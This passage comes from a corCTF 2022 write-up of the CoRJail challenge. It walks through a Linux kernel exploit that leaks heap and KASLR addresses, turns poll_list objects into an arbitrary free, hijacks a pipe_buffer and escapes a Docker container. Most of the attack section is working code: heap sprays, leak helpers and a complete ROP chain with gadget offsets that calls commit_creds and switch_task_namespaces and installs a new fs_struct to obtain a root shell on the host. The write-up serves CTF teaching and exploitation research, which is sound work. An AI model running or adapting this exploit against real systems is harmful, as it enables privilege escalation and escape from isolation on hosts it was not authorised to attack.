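```c
#include <stdint.h>

#define KERNEL_TEXT_START 0xffffffff80000000ULL
#define KERNEL_TEXT_END   0xffffffffc0000000ULL

/* Does v fall inside the kernel image mapping? */
int looks_like_kernel_text(uint64_t v)
{
    return v >= KERNEL_TEXT_START && v < KERNEL_TEXT_END;
}

/* Compute the KASLR slide from a leaked runtime address and the address
 * of the same symbol in the non-randomized image.
 * Returns 0 and stores the slide on success, -1 if the leak is implausible. */
int kaslr_slide(uint64_t leaked, uint64_t unslid, uint64_t *slide)
{
    if (!looks_like_kernel_text(leaked) || leaked < unslid)
        return -1;

    if ((leaked - unslid) & 0x1fffff) /* assumed 2 MiB granularity */
        return -1;

    *slide = leaked - unslid;
    return 0;
}
```

A key whose first leaked QWORD fails these checks is simply not the corrupted one, so the caller can move on to the next key.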

When we open /dev/ptmx, two structures of interest are allocated: the well-known tty_struct in kmalloc-1024 and tty_file_private in kmalloc-32. Each tty_file_private structure holds a pointer to its associated tty_struct, so we can use it to leak the address of an object in kmalloc-1024.

We can free all the keys in kmalloc-32 (orange chunks in [Fig. 3A]), [3] except the corrupted one, and replace them with tty_file_private structures (blue chunks in [Fig. 3B]). [4] Then we call leak_heap_pointer() and use the Out-Of-Bounds Read primitive to leak the tty_struct address. [5] [Fig. 3B]
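One way leak_heap_pointer() could pick the tty_struct address out of the leaked bytes is sketched below. It is a heuristic built on assumptions: the leak buffer starts at the key data (offset 24 of the corrupted slot), so the next 32-byte slot begins at QWORD index 1; tty_file_private stores its tty pointer in the first QWORD; and objects in kmalloc-1024 are 1024-byte aligned. The function names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

/* Canonical kernel address below the kernel image, 1024-byte aligned. */
int looks_like_kmalloc1k_ptr(uint64_t v)
{
    return v >= 0xffff800000000000ULL &&
           v <  0xffffffff80000000ULL &&
           (v & 0x3ff) == 0;
}

/* Scan the first QWORD of each 32-byte slot following the corrupted key.
 * Returns the first plausible tty_struct pointer, or 0 if none is found. */
uint64_t find_tty_struct_ptr(const uint64_t *leak, size_t n_qwords)
{
    /* leak[0] is the tail of the corrupted slot; slots start at leak[1]. */
    for (size_t i = 1; i < n_qwords; i += 4)
        if (looks_like_kmalloc1k_ptr(leak[i]))
            return leak[i];

    return 0;
}
```

Checking only slot starts avoids false positives from the other pointers stored inside tty_file_private.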

The Exploit - Hijacking Control Flow

At this point we need to free the object in kmalloc-1024.

[...]

for (int i = 2048; i < 2048 + 128; i++)
    free_seq_ops(i); // [1]

for (int i = 0; i < 192; i++)
    create_poll_thread(i, 24, 3000, true); // [2]

free_key(corrupted_key); // [3]
sleep(1); // GC key

*(uint64_t *)&data[0] = target_object - 0x18; // [4]

for (int i = 0; i < MAX_KEYS; i++)
{
    setxattr("/home/user/.bashrc", "user.x", data, 32, XATTR_CREATE);
    keys[i] = alloc_key(n_keys++, key, 32); // [5]
}

[...]

First, we free all the seq_operations structures in kmalloc-32 (yellow chunks in [Fig. 3A-3B]) [1], then we replace them with poll_list objects (green chunks in [Fig. 4A]) [2]. Note that the seq_operations structure used to corrupt the user key is also freed and it is also replaced by a poll_list structure. [Fig. 4A]

Now we free the corrupted key, causing a Use-After-Free situation over the poll_list. [3] To exploit the Use-After-Free, we reuse the setxattr() trick used in the first stage, but this time, instead of zeroing out the chunk, we set its first QWORD to target object - 0x18 bytes [4], then we allocate a user_key_payload structure to consolidate the setxattr buffer in memory.

In other words, since the chunk used by setxattr is automatically freed when the function returns, we allocate a user key (remember, the first member of a user_key_payload structure is not initialized) to prevent the first QWORD we just set with setxattr from being overwritten by a subsequent allocation. [5]

Doing so, we will overwrite the next field of the poll_list structure in kmalloc-32 with the target - 0x18 bytes. [Fig. 4B]

Originally, my goal was to arbitrarily free a tty_struct and get RIP control overwriting its tty_operations pointer. Then I changed my mind (too many checks, even if they can be bypassed), and I decided to target a pipe_buffer structure.

[...]

for (int i = 0; i < 72; i++)
    free_tty(i); // [1]

sleep(1); // GC TTYs

for (int i = 0; i < 1024; i++)
    alloc_pipe_buff(i); // [2]

[...]

free_all_keys(false);

for (int i = 0; i < 31; i++)
    keys[i] = alloc_key(n_keys++, buff, 600); // [3]

for (int i = 0; i < 1024; i++)
    release_pipe_buff(i); // [4]

[...]

We proceed by freeing all TTYs [1] and spraying pipe_buffer objects [2]. This way we replace every tty_struct with a pipe_buffer in kmalloc-1024. Then we wait until the timers expire, and the pipe_buffer object pointed to by the next field of the corrupted poll_list is automatically freed. [Fig. 5A]

Finally, we free all user keys, and we reallocate them in kmalloc-1024: we use them to spray our ROP-chain. [3] One of the key payloads will corrupt the target pipe_buffer, overwriting the anon_pipe_buf_ops pointer with a stack pivot gadget.

Now we only need to close all pipes, triggering the call to pipe_release(). [4] This will execute our stack pivot gadget, and we will finally be able to hijack control flow. [Fig. 5B]
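The offsets involved can be sketched with stand-in structures. This is an illustration inferred from the buff[] offsets used in the ROP chain of this article, assuming the x86-64 layouts of pipe_buffer and pipe_buf_operations in 5.10; forge_pipe_buffer() is a hypothetical helper. Since the user_key_payload header is 0x18 bytes long, freeing target - 0x18 makes the key data start exactly at the target object.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Stand-in for struct pipe_buffer. */
struct fake_pipe_buffer {
    uint64_t page;
    uint32_t offset, len;
    uint64_t ops;        /* const struct pipe_buf_operations * */
    uint32_t flags;
    uint64_t priv;       /* "private" in the kernel */
};

/* Stand-in for struct pipe_buf_operations. */
struct fake_pipe_buf_operations {
    uint64_t confirm;
    uint64_t release;    /* invoked for each buffer when the pipe is released */
    uint64_t try_steal;
    uint64_t get;
};

#define FAKE_OPS_OFFSET 0x30 /* fake ops table location inside the payload */

/* buff is the key payload, assumed to overlap the freed pipe_buffer that
 * lives at kernel address target. */
void forge_pipe_buffer(uint8_t *buff, uint64_t target, uint64_t gadget)
{
    uint64_t ops = target + FAKE_OPS_OFFSET;

    /* pipe_buffer.ops now points back into our own payload... */
    memcpy(buff + offsetof(struct fake_pipe_buffer, ops), &ops, sizeof(ops));

    /* ...where the release slot holds the first gadget. */
    memcpy(buff + FAKE_OPS_OFFSET +
           offsetof(struct fake_pipe_buf_operations, release),
           &gadget, sizeof(gadget));
}
```

This reproduces the two writes at buff[0x10] and buff[0x38] in the chain: the ops pointer at offset 0x10 and the release handler at 0x30 + 8.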

The Exploit - Container Escape

The last piece of the puzzle is the ROP-chain used to escape from the container. Let’s take a look at what I used in the exploit:

buff = (char *)calloc(1, 1024);

// Stack pivot    [1]
*(uint64_t *)&buff[0x10] = target_object + 0x30;             // anon_pipe_buf_ops
*(uint64_t *)&buff[0x38] = kernel_base + 0xffffffff81882840; // push rsi ; in eax, dx ; jmp qword ptr [rsi + 0x66]
*(uint64_t *)&buff[0x66] = kernel_base + 0xffffffff810007a9; // pop rsp ; ret
*(uint64_t *)&buff[0x00] = kernel_base + 0xffffffff813c6b78; // add rsp, 0x78 ; ret

// ROP
rop = (uint64_t *)&buff[0x80];

// creds = prepare_kernel_cred(0)   [2]
*rop ++= kernel_base + 0xffffffff81001618; // pop rdi ; ret
*rop ++= 0;                                // 0
*rop ++= kernel_base + 0xffffffff810ebc90; // prepare_kernel_cred

// commit_creds(creds)    [3]
*rop ++= kernel_base + 0xffffffff8101f5fc; // pop rcx ; ret
*rop ++= 0;                                // 0
*rop ++= kernel_base + 0xffffffff81a05e4b; // mov rdi, rax ; rep movsq qword ptr [rdi], qword ptr [rsi] ; ret
*rop ++= kernel_base + 0xffffffff810eba40; // commit_creds

// task = find_task_by_vpid(1)    [4]
*rop ++= kernel_base + 0xffffffff81001618; // pop rdi ; ret
*rop ++= 1;                                // pid
*rop ++= kernel_base + 0xffffffff810e4fc0; // find_task_by_vpid

// switch_task_namespaces(task, init_nsproxy)    [5]
*rop ++= kernel_base + 0xffffffff8101f5fc; // pop rcx ; ret
*rop ++= 0;                                // 0
*rop ++= kernel_base + 0xffffffff81a05e4b; // mov rdi, rax ; rep movsq qword ptr [rdi], qword ptr [rsi] ; ret
*rop ++= kernel_base + 0xffffffff8100051c; // pop rsi ; ret
*rop ++= kernel_base + 0xffffffff8245a720; // init_nsproxy;
*rop ++= kernel_base + 0xffffffff810ea4e0; // switch_task_namespaces

// new_fs = copy_fs_struct(init_fs)    [6]
*rop ++= kernel_base + 0xffffffff81001618; // pop rdi ; ret
*rop ++= kernel_base + 0xffffffff82589740; // init_fs;
*rop ++= kernel_base + 0xffffffff812e7350; // copy_fs_struct;
*rop ++= kernel_base + 0xffffffff810e6cb7; // push rax ; pop rbx ; ret

// current = find_task_by_vpid(getpid())    [7]
*rop ++= kernel_base + 0xffffffff81001618; // pop rdi ; ret
*rop ++= getpid();                         // pid
*rop ++= kernel_base + 0xffffffff810e4fc0; // find_task_by_vpid

// current->fs = new_fs    [8]
*rop ++= kernel_base + 0xffffffff8101f5fc; // pop rcx ; ret
*rop ++= 0x6e0;                            // offset of the fs field in task_struct (current->fs) on this kernel build
*rop ++= kernel_base + 0xffffffff8102396f; // add rax, rcx ; ret
*rop ++= kernel_base + 0xffffffff817e1d6d; // mov qword ptr [rax], rbx ; pop rbx ; ret
*rop ++= 0;                                // rbx

// kpti trampoline    [9]
*rop ++= kernel_base + 0xffffffff81c00ef0 + 22; // swapgs_restore_regs_and_return_to_usermode + 22
*rop ++= 0;
*rop ++= 0;
*rop ++= (uint64_t)&win;
*rop ++= usr_cs;
*rop ++= usr_rflags;
*rop ++= (uint64_t)(stack + 0x5000);
*rop ++= usr_ss;

The first part is straightforward. We use a stack pivot gadget to hijack control flow [1], then call prepare_kernel_cred() [2] and commit_creds() [3] to escalate privileges. Next, we locate the Docker container task (PID 1 as seen from inside the container) using find_task_by_vpid() [4] and call switch_task_namespaces() [5] to replace its nsproxy structure with init_nsproxy. But this is not enough to escape from the container.
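A note on the address arithmetic used throughout the chain: every gadget is written as kernel_base plus an absolute link-time address, so kernel_base appears to hold the KASLR slide rather than the address where the kernel image starts. The following is a minimal sketch of that arithmetic, together with a bounds-checked way to append entries. The struct rop_chain type and the helpers kaslr_slide(), rop_push() and rop_push_kaddr() are hypothetical names introduced for illustration; they are not part of the original exploit.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper type: a bounds-checked cursor over the fake stack. */
struct rop_chain {
    uint64_t *slots; /* backing storage for the chain */
    size_t    cap;   /* capacity in 8-byte slots */
    size_t    len;   /* slots written so far */
};

/* KASLR slide: runtime address of a symbol minus its address in the
 * unrandomized kernel image (the 0xffffffff81... values in the listing). */
static uint64_t kaslr_slide(uint64_t leaked_addr, uint64_t static_addr)
{
    return leaked_addr - static_addr;
}

/* Append one raw value; returns 0 on success, -1 if the chain is full. */
static int rop_push(struct rop_chain *c, uint64_t value)
{
    if (c->len >= c->cap)
        return -1;
    c->slots[c->len++] = value;
    return 0;
}

/* Append a kernel address given its link-time address and the slide. */
static int rop_push_kaddr(struct rop_chain *c, uint64_t slide,
                          uint64_t static_addr)
{
    return rop_push(c, slide + static_addr);
}
```

With this layout, a leaked pointer to any known symbol is enough to relocate the whole chain, and an overlong chain fails loudly instead of silently overrunning the buffer.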

In Docker containers, unlike in Google’s kCTF, setns() is blocked by the default seccomp profile. This means that we cannot use it to enter other namespaces after returning to user space. We need an alternative approach, and we need to implement it in the ROP-chain itself.

Reading the setns() source code, we can see that it calls commit_nsset() to actually move the task into a different namespace. We can replicate what it does: we use copy_fs_struct() to clone the init_fs structure [6], locate the current task using find_task_by_vpid() [7], and manually install the new fs_struct using a write-what-where gadget [8].
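To make steps [6] and [8] concrete, here is a userland mock of what the gadgets compute. It is only a sketch: struct mock_fs and struct mock_task are stand-ins invented for this example and do not match the real kernel layouts. The only value taken from the chain is the 0x6e0 offset of the fs pointer, which is specific to the challenge kernel.

```c
#include <stdint.h>
#include <string.h>

#define TASK_FS_OFFSET 0x6e0 /* offset used in step [8]; kernel-build specific */

/* Userland stand-ins, NOT the real kernel structures. */
struct mock_fs   { int users; char root[16]; };
struct mock_task { unsigned char raw[0x800]; };

/* Step [6] analogue: clone a template fs, as copy_fs_struct(init_fs) does. */
static void mock_copy_fs(struct mock_fs *dst, const struct mock_fs *src)
{
    *dst = *src;
    dst->users = 1; /* the fresh copy has a single user */
}

/* Step [8] analogue: "add rax, rcx ; mov qword ptr [rax], rbx". */
static void install_fs(struct mock_task *task, const struct mock_fs *new_fs)
{
    unsigned char *slot = task->raw + TASK_FS_OFFSET; /* rax = task + rcx */
    memcpy(slot, &new_fs, sizeof(new_fs));            /* [rax] = rbx      */
}

/* Read back the pointer stored in the task's fs slot. */
static const struct mock_fs *task_fs(const struct mock_task *task)
{
    const struct mock_fs *fs;
    memcpy(&fs, task->raw + TASK_FS_OFFSET, sizeof(fs));
    return fs;
}
```

The point of the mock is that the whole "namespace switch" for the filesystem view reduces to one pointer-sized store at a fixed offset inside the task structure, which is why a single write-what-where gadget is enough.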

Finally, we return to user space through the KPTI trampoline in swapgs_restore_regs_and_return_to_usermode and get a shell on the host [9].
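The seven values that follow the trampoline address in step [9] can be read as two filler slots, which the trampoline consumes before reaching the return frame, followed by the five-word frame that iretq expects: rip, cs, rflags, rsp, ss. A minimal sketch of that layout follows. The struct user_ctx type and emit_trampoline_frame() are hypothetical names used only for this example.

```c
#include <stddef.h>
#include <stdint.h>

/* Slots consumed after the trampoline address in step [9]:
 * two filler values plus the 5-word iretq frame. */
#define TRAMPOLINE_SLOTS 7

/* User-mode context to resume; field order matches the iretq frame. */
struct user_ctx {
    uint64_t rip, cs, rflags, rsp, ss;
};

/* Write the filler slots and the iretq frame; returns slots written. */
static size_t emit_trampoline_frame(uint64_t *rop, const struct user_ctx *u)
{
    size_t i = 0;
    rop[i++] = 0;         /* filler consumed by the trampoline */
    rop[i++] = 0;         /* filler consumed by the trampoline */
    rop[i++] = u->rip;    /* where user-mode execution resumes (win) */
    rop[i++] = u->cs;     /* saved user code segment */
    rop[i++] = u->rflags; /* saved user flags */
    rop[i++] = u->rsp;    /* user stack to switch to */
    rop[i++] = u->ss;     /* saved user stack segment */
    return i;
}
```

In the exploit, cs, ss and rflags are the values saved from user space before triggering the bug, and rsp points into a user-controlled stack buffer.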

Here is the final exploit in action:

The final exploit can be found here: exploit.c.

PS: In the exploit, I move the process to another core before creating the poll threads. This reduces the noise that thread creation would otherwise cause in the core 0 slabs. Once a thread has been created, it is assigned back to core 0 before calling poll().
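The pinning itself can be done with sched_setaffinity(). The helper below is a minimal sketch, assuming glibc on Linux; pin_to_cpu() is a name chosen for this example and may differ from what exploit.c uses.

```c
#define _GNU_SOURCE
#include <sched.h>

/* Pin the calling thread to a single CPU.
 * Returns 0 on success, -1 on error (errno is set by sched_setaffinity). */
static int pin_to_cpu(int cpu)
{
    cpu_set_t set;

    CPU_ZERO(&set);
    CPU_SET(cpu, &set);
    /* pid 0 means "the calling thread". */
    return sched_setaffinity(0, sizeof(set), &set);
}
```

Under this scheme, the main thread would call pin_to_cpu(1) before pthread_create(), and each new thread would call pin_to_cpu(0) as its first action, right before poll(), so that its poll_list allocations come from the core 0 slabs.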

Conclusion

poll_list objects can be used to obtain an arbitrary free primitive in almost every general purpose cache. Many recent vulnerabilities can be exploited using this structure in the complete absence of msg_msg objects.

CoRJail only had one solver. A big shout-out goes to Kylebot for getting first blood. It turns out that extended security attributes were usable inside the container without requiring any special capability, so he could solve the challenge by transforming the Off-By-Null in kmalloc-4k into a Cross-Cache Null Byte Overflow targeting the list.next pointer of a simple_xattr structure in kmalloc-192.

Objects in this cache are not aligned to 256 bytes, so he made the corrupted pointer point into the middle of another simple_xattr object in the same slab. There, he forged a fake header to obtain an Out-Of-Bounds Read primitive.
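The alignment argument can be checked with a little arithmetic. On a little-endian machine, a single null byte written at the start of a pointer clears its least significant byte, which rounds the address down to a multiple of 256. Since 192 does not divide 256, the rounded address usually lands inside a neighbouring object. The sketch below uses a made-up slab base address, and the helper names are invented for this example.

```c
#include <stdint.h>

#define XATTR_OBJ_SIZE 192u /* kmalloc-192 object size */

/* Effect of one null byte over the least significant byte of a pointer. */
static uint64_t null_low_byte(uint64_t ptr)
{
    return ptr & ~0xffULL;
}

/* Index of the object containing ptr, for a slab starting at slab_base. */
static uint64_t object_index(uint64_t slab_base, uint64_t ptr)
{
    return (ptr - slab_base) / XATTR_OBJ_SIZE;
}

/* Byte offset of ptr inside the object that contains it. */
static uint64_t offset_in_object(uint64_t slab_base, uint64_t ptr)
{
    return (ptr - slab_base) % XATTR_OBJ_SIZE;
}
```

For example, with a slab at the illustrative address 0xffff888012340000, a list.next pointer to object 2 (slab offset 0x180) becomes slab offset 0x100 after the overflow, which is 64 bytes into object 1. That is where the fake simple_xattr header has to be placed.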

To fake a simple_xattr structure, he needed a valid pointer to controlled data for the name field, so he ended up using another kCTF technique: he faked the pointer and its content using cpu_entry_area. This memory region is not affected by KASLR and, as reported by Kylebot, it is possible to use a div 0 or a ud2 instruction to copy all CPU registers into this region and use them as a payload.

After obtaining an information leak, he used the recent unlinking attack with simple_xattr to overwrite the file_operations pointer of a file structure with a controlled heap address. From there, he could hijack control flow and use a ROP-chain to escape from the container. What a crazy approach, isn’t it?

If you have any questions or need any clarification, feel free to contact me. You can find my contact information in About.

The challenge can be downloaded from the corCTF 2022 Public Archive.

References

Syscall statistics patch

https://lwn.net/Articles/896474/

Utilizing msg_msg Objects For Arbitrary Read And Arbitrary Write In The Linux Kernel

https://www.willsroot.io/2021/08/corctf-2021-fire-of-salvation-writeup.html (Part 1: Fire Of Salvation)
https://syst3mfailure.io/wall-of-perdition (Part 2: Wall Of Perdition)

modprobe_path trick

https://github.com/smallkirby/kernelpwn/blob/master/technique/modprobe_path.md

Unlinking attack with simple_xattr

https://www.starlabs.sg/blog/2022/06-io_uring-new-code-new-bugs-and-a-new-exploit-technique/#unlinking-attack

D3vil